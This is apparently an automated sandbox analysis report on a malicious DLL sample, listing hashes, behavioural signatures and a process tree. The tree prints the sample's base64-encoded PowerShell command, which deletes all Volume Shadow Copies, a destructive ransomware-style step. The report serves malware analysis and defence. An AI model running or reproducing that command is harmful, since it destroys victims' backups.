Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
16-05-2024 01:50
Behavioral task
behavioral1
Sample
4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll
Resource
win10v2004-20240426-en
General
-
Target
4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll
-
Size
164KB
-
MD5
4903f3effb98da65c49bb9591c16615d
-
SHA1
d53e85991420c1475385babd72d31ee77faefc6d
-
SHA256
42996516b6604ba136ff909d9b59d2a676a72eaafa30c729cdfaddd96b20fc83
-
SHA512
454b8a5f3528ce77d993b84ccd0df7b8f0843a6a47516b1aa13fe6cbb79d1853646e03c7c9663266df154fd464f594d41be1e392d0c8c3dd676e4348e5149880
-
SSDEEP
3072:BrX1t2U05pbJ5xhxY9doh7O79siUs/NaDn3Ka9:BrltH05f5v2i7O93Nenaa9
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\E: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 2248 rundll32.exe 2268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2268 powershell.exe Token: SeBackupPrivilege 2616 vssvc.exe Token: SeRestorePrivilege 2616 vssvc.exe Token: SeAuditPrivilege 2616 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 2248 1084 rundll32.exe rundll32.exe PID 2248 wrote to memory of 2268 2248 rundll32.exe powershell.exe PID 2248 wrote to memory of 2268 2248 rundll32.exe powershell.exe PID 2248 wrote to memory of 2268 2248 rundll32.exe powershell.exe PID 2248 wrote to memory of 2268 2248 rundll32.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1720
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2268-4-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmpFilesize
4KB
-
memory/2268-5-0x000000001B1F0000-0x000000001B4D2000-memory.dmpFilesize
2.9MB
-
memory/2268-6-0x0000000001E60000-0x0000000001E68000-memory.dmpFilesize
32KB
-
memory/2268-7-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmpFilesize
9.6MB
-
memory/2268-8-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmpFilesize
9.6MB
-
memory/2268-9-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmpFilesize
9.6MB
-
memory/2268-10-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmpFilesize
9.6MB
-
memory/2268-11-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmpFilesize
9.6MB
-
memory/2268-12-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmpFilesize
9.6MB